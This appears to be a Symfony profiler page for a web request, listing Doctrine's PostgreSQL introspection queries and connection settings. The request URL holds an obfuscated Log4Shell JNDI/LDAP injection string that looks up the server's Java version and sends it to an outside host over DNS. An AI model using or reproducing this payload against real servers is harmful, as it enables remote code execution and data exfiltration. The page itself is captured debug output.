http://rad-sdsc.ucsd.edu/${${uznk:-j}${1:-n}${e6i:-d}${g4rq:wb02:-i}${z2:jynq:gwdx:-:}${dc:4:-l}${ut1:2im:-d}${fvd1:3qev:d:-a}${ui:-p}${s0tv:g1um:hu8e:-:}${v:-/}${suwa:8:ga:-/}${m:z4:ne:-P}${s:-A}${tw:-l}${gi9l:an:8p37:-0}${3:-c}${kwx:ctd:--}${${lu:0fv:-s}${sh0u:rhs:qz2:-y}${bv:-s}${6ruk:-:}${d0q:3yg:u:-j}${ykf5:-a}${4z:-v}${vah:-a}${hz:t:-.}${n:h:-v}${en:4i:-e}${z:-r}${0d:qf:i:-s}${58b:wc:v:-i}${xi4:wkl:-o}${5:-n}}${e:l:-.}${m7:m:-b}${eut:-3}${vlb:j:p:-4}${aus:uh:-2}${5v:2j:xm9:-0}${6:-d}${92:5ru:jxd:-a}${vtb:-8}${et:-7}${yti:925l:-2}${pnq6:mk:-2}${p:q:427:-6}${5a:-6}${5f:-c}${gw:m:z:-e}${0:95:-6}${0865:e:-4}${154b:r18s:y:-e}${tln:p:-1}${53hj:-5}${8s6:fwy:k:-c}${yg8x:-f}${7ae:yuo:m:-a}${mzuf:9t:mdr:-2}${q0:ljup:nt5:-2}${1j6n:-e}${51c:-a}${r:52y8:v9:-3}${8p:bq:-5}${ntw:-1}${1:-4}${c3:-0}${o:dfgx:-3}${14lt:0rj:-3}${m6fl:o9:b:-8}${pmet:-f}${v:fc:82:-d}${3:va:q1:-9}${c6:-0}${lyh:dza:edi:-e}${v:nt98:-2}${l:-a}${ug5y:m:-.}${j:4n:pl:-d}${580q:f:-n}${7:gv8:-s}${1:8m:--}${f:-e}${8:4:s:-x}${1o4f:6bu:wc:-f}${i1x:9ja5:ci9:-i}${9j:1f6:-l}${j:-.}${c4:o:0u:-m}${m7y6:-a}${agf0:jwok:86dy:-s}${rh4f:uy:-m}${5s:9bp:-c}${iv:8:u:-o}${ap:biow:stn:-r}${04mz:jg:sg7:-e}${ulf:p9t:lgq:--}${3yg:-c}${ar4c:-f}${7v0:h:--}${dnbv:tyx:-p}${6:imha:-r}${zi6:og:39ta:-o}${c:yb:89:-d}${3ub7:av4x:m:--}${sulz:-0}${9auc:y56:mdlw:-2}${t9eq:op:-.}${e2f:0h:njh9:-m}${pz:nfuj:-a}${jh:-s}${4:-m}${bf:d8uj:h:-.}${fe:-c}${np:5:t:-l}${x7pw:h3k:-o}${0s5:i:nsl:-u}${ar:xm:-d}${oy3g:j:-f}${kga:-e}${4l:2t0:-r}${r7qj:-r}${sa:uxi:-y}${9n3g:qj8:rm3:-.}${57e:5l:4q:-g}${15n:28ez:-o}${dm:1zt:r0y:-o}${i:8:nl:-g}}

Query Metrics

14 Database Queries
10 Different statements
9.10 ms Query time
0 Invalid entities

Queries

Group similar statements

# Time Info
1 3.30 ms
SELECT quote_ident(table_name) AS table_name,
                       table_schema AS schema_name
                FROM   information_schema.tables
                WHERE  table_schema NOT LIKE 'pg\_%'
                AND    table_schema != 'information_schema'
                AND    table_name != 'geometry_columns'
                AND    table_name != 'spatial_ref_sys'
                AND    table_type != 'VIEW'
Parameters:
[]
2 0.48 ms
SELECT schema_name
FROM   information_schema.schemata
WHERE  schema_name NOT LIKE 'pg\_%'
AND    schema_name != 'information_schema'
Parameters:
[]
3 0.14 ms
SHOW search_path
Parameters:
[]
4 0.91 ms
SELECT quote_ident(table_name) AS table_name,
                       table_schema AS schema_name
                FROM   information_schema.tables
                WHERE  table_schema NOT LIKE 'pg\_%'
                AND    table_schema != 'information_schema'
                AND    table_name != 'geometry_columns'
                AND    table_name != 'spatial_ref_sys'
                AND    table_type != 'VIEW'
Parameters:
[]
5 0.17 ms
SELECT CURRENT_DATABASE()
Parameters:
[]
6 1.66 ms
SELECT
                    a.attnum,
                    quote_ident(a.attname) AS field,
                    t.typname AS type,
                    format_type(a.atttypid, a.atttypmod) AS complete_type,
                    (SELECT tc.collcollate FROM pg_catalog.pg_collation tc WHERE tc.oid = a.attcollation) AS collation,
                    (SELECT t1.typname FROM pg_catalog.pg_type t1 WHERE t1.oid = t.typbasetype) AS domain_type,
                    (SELECT format_type(t2.typbasetype, t2.typtypmod) FROM
                      pg_catalog.pg_type t2 WHERE t2.typtype = 'd' AND t2.oid = a.atttypid) AS domain_complete_type,
                    a.attnotnull AS isnotnull,
                    (SELECT 't'
                     FROM pg_index
                     WHERE c.oid = pg_index.indrelid
                        AND pg_index.indkey[0] = a.attnum
                        AND pg_index.indisprimary = 't'
                    ) AS pri,
                    (SELECT pg_get_expr(adbin, adrelid)
                     FROM pg_attrdef
                     WHERE c.oid = pg_attrdef.adrelid
                        AND pg_attrdef.adnum=a.attnum
                    ) AS default,
                    (SELECT pg_description.description
                        FROM pg_description WHERE pg_description.objoid = c.oid AND a.attnum = pg_description.objsubid
                    ) AS comment
                    FROM pg_attribute a, pg_class c, pg_type t, pg_namespace n
                    WHERE n.nspname NOT IN ('pg_catalog', 'information_schema', 'pg_toast') AND c.relname = 'doctrine_migration_versions' AND n.nspname = ANY(current_schemas(false))
                        AND a.attnum > 0
                        AND a.attrelid = c.oid
                        AND a.atttypid = t.oid
                        AND n.oid = c.relnamespace
                    ORDER BY a.attnum
Parameters:
[]
7 0.13 ms
SELECT CURRENT_DATABASE()
Parameters:
[]
8 0.48 ms
SELECT quote_ident(r.conname) as conname, pg_catalog.pg_get_constraintdef(r.oid, true) as condef
                  FROM pg_catalog.pg_constraint r
                  WHERE r.conrelid =
                  (
                      SELECT c.oid
                      FROM pg_catalog.pg_class c, pg_catalog.pg_namespace n
                      WHERE n.nspname NOT IN ('pg_catalog', 'information_schema', 'pg_toast') AND c.relname = 'doctrine_migration_versions' AND n.nspname = ANY(current_schemas(false)) AND n.oid = c.relnamespace
                  )
                  AND r.contype = 'f'
Parameters:
[]
9 0.12 ms
SELECT CURRENT_DATABASE()
Parameters:
[]
10 0.61 ms
SELECT quote_ident(relname) as relname, pg_index.indisunique, pg_index.indisprimary,
                       pg_index.indkey, pg_index.indrelid,
                       pg_get_expr(indpred, indrelid) AS where
                 FROM pg_class, pg_index
                 WHERE oid IN (
                    SELECT indexrelid
                    FROM pg_index si, pg_class sc, pg_namespace sn
                    WHERE sn.nspname NOT IN ('pg_catalog', 'information_schema', 'pg_toast') AND sc.relname = 'doctrine_migration_versions' AND sn.nspname = ANY(current_schemas(false))
                    AND sc.oid=si.indrelid AND sc.relnamespace = sn.oid
                 ) AND pg_index.indexrelid = oid
Parameters:
[]
11 0.35 ms
SELECT attnum, attname FROM pg_attribute WHERE attrelid=33130 AND attnum IN (1) ORDER BY attnum ASC
Parameters:
[]
12 0.26 ms
SELECT obj_description('doctrine_migration_versions'::regclass) AS table_comment;
Parameters:
[]
13 0.22 ms
SELECT * FROM doctrine_migration_versions
Parameters:
[]
14 0.27 ms
SELECT CURRENT_DATABASE()
Parameters:
[]

Database Connections

Name Service
default doctrine.dbal.default_connection

Entity Managers

Name Service
default doctrine.orm.default_entity_manager

Second Level Cache

Second Level Cache is not enabled.

Entities Mapping

No loaded entities.